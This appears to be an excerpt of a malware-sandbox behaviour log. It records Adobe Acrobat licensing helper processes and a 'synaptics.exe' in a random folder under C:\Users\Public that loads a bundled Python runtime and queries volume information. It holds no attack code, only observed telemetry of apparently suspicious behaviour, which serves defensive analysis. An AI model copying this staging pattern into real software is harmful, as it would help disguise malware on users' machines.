Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "c:\program files\adobe\acrobat dc\acrobat\ngl\cefworkflow\adobe_licensing_wf_helper_acro.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-us --service-sandbox-type=none --no-sandbox --log-severity=disable --lang=en-us --cef-dll-path="c:\program files\adobe\acrobat dc\acrobat\acrocef_1" --log-file="c:\program files\adobe\acrobat dc\acrobat\ngl\cefworkflow\debug.log" --mojo-platform-channel-handle=1828 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=webrtchidelocalipswithmdns /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "c:\program files\adobe\acrobat dc\acrobat\ngl\cefworkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="c:\program files\adobe\acrobat dc\acrobat\acrocef_1" --first-renderer-process --no-sandbox --log-file="c:\program files\adobe\acrobat dc\acrobat\ngl\cefworkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-us --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=5213362510 --mojo-platform-channel-handle=2228 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=webrtchidelocalipswithmdns /prefetch:1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "c:\program files\adobe\acrobat dc\acrobat\ngl\cefworkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="c:\program files\adobe\acrobat dc\acrobat\acrocef_1" --no-sandbox --log-file="c:\program files\adobe\acrobat dc\acrobat\ngl\cefworkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-us --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --launch-time-ticks=5213441251 --mojo-platform-channel-handle=2300 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=webrtchidelocalipswithmdns /prefetch:1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "c:\program files\adobe\acrobat dc\acrobat\ngl\cefworkflow\adobe_licensing_wf_helper_acro.exe" --type=gpu-process --no-sandbox --log-severity=disable --lang=en-us --cef-dll-path="c:\program files\adobe\acrobat dc\acrobat\acrocef_1" --gpu-preferences=uaaaaaaaaadgacayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --use-gl=disabled --log-file="c:\program files\adobe\acrobat dc\acrobat\ngl\cefworkflow\debug.log" --mojo-platform-channel-handle=2340 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=webrtchidelocalipswithmdns /prefetch:2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe "c:\program files\adobe\acrobat dc\acrobat\ngl\cefworkflow\adobe_licensing_wf_helper_acro.exe" --type=renderer --log-severity=disable --cef-dll-path="c:\program files\adobe\acrobat dc\acrobat\acrocef_1" --no-sandbox --log-file="c:\program files\adobe\acrobat dc\acrobat\ngl\cefworkflow\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-us --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --launch-time-ticks=5225407327 --mojo-platform-channel-handle=2916 --field-trial-handle=1708,i,14820355870963590142,4218514559140099384,131072 --disable-features=webrtchidelocalipswithmdns /prefetch:1

Language, Device and Operating System Detection

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\__pycache__\__init__.cpython-310.pyc.20381728 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\codecs.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\codecs.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\codecs.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\codecs.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\codecs.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\codecs.cpython-310.pyc.15514848 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\__pycache__\aliases.cpython-310.pyc.20384328 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\__pycache__\utf_8.cpython-310.pyc.20384328 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\encodings\__pycache__\cp1252.cpython-310.pyc.20385680 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\io.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\io.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\io.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\io.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\io.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\io.cpython-310.pyc.20635856 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\abc.cpython-310.pyc.20647040 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\site.cpython-310.pyc.20646952 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\os.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\os.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\os.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\os.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\os.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\os.cpython-310.pyc.20643872 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\stat.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\stat.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\stat.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\stat.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\stat.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\stat.cpython-310.pyc.20487824 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\_collections_abc.cpython-310.pyc.20987480 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\ntpath.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\ntpath.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\ntpath.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\ntpath.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\ntpath.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\ntpath.cpython-310.pyc.20608352 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\genericpath.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\genericpath.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\genericpath.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\genericpath.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\genericpath.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\genericpath.cpython-310.pyc.20608544 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\_sitebuiltins.cpython-310.pyc.20992552 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\distutils-precedence.pth VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\_distutils_hack VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc.15531680 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pywin32.pth VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32 VolumeInformation
